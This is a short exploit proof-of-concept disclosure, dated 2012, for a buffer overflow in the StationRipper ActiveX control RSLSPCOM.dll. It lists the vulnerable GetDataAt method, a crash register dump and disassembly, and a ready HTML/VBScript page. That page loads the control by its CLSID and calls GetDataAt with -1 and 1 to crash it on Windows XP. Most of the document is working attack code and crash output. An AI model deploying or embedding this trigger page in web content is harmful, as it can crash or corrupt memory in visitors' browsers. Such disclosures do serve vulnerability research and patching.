Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC
Date: July 19, 2012
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage: www.stationripper.com
Version: 2.98.3/1
Tested on: windows XP SP3
---------------------------------------------------------------------------------------
cheers to awesome hippie flaw hunter
---------------------------------------------------------------------------------------
Class SSLDataContainer
GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704}
GetDataAt
Function GetDataAt (
ByVal lPos As Long ,
ByVal lHowMuch As Long
) As String
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EIP 003B1191
EAX 00000000
EBX 003BB3BC -> 003B3904
ECX 003D2120 -> BAADF00D
EDX 00000000
EDI FFFFFFFF
ESI 00000000
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED64 -> 003BB3BC
Block Disassembly:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3B1181 MOV DL,AL
3B1183 AND DL,F
3B1186 SHL DL,2
3B1189 OR [EBP+13],DL
3B118C SHR AL,4
3B118F MOV DL,AL
3B1191 MOV AL,[EDI] <--- CRASH
3B1193 MOV BL,AL
3B1195 AND BL,3
3B1198 SHL BL,4
3B119B OR DL,BL
3B119D SHR AL,2
3B11A0 MOV [EBP+F],AL
3B11A3 MOV EAX,[EBP-4]
3B11A6 SUB [EBP-8],EAX
ArgDump:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EBP+8 003D2120 -> BAADF00D
EBP+12 FFFFFFFF
EBP+16 00000001
EBP+20 00000005
EBP+24 00000001
EBP+28 00000000
<html>
Exploit
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll"
prototype = "Function GetDataAt ( ByVal lPos As Long , ByVal
lHowMuch As Long ) As String"
memberName = "GetDataAt"
progid = "SSLHIJACKCLIENTCOMLib.SSLDataContainer"
argCount = 2
arg1=-1
arg2=1
xpl.GetDataAt arg1 ,arg2
</script>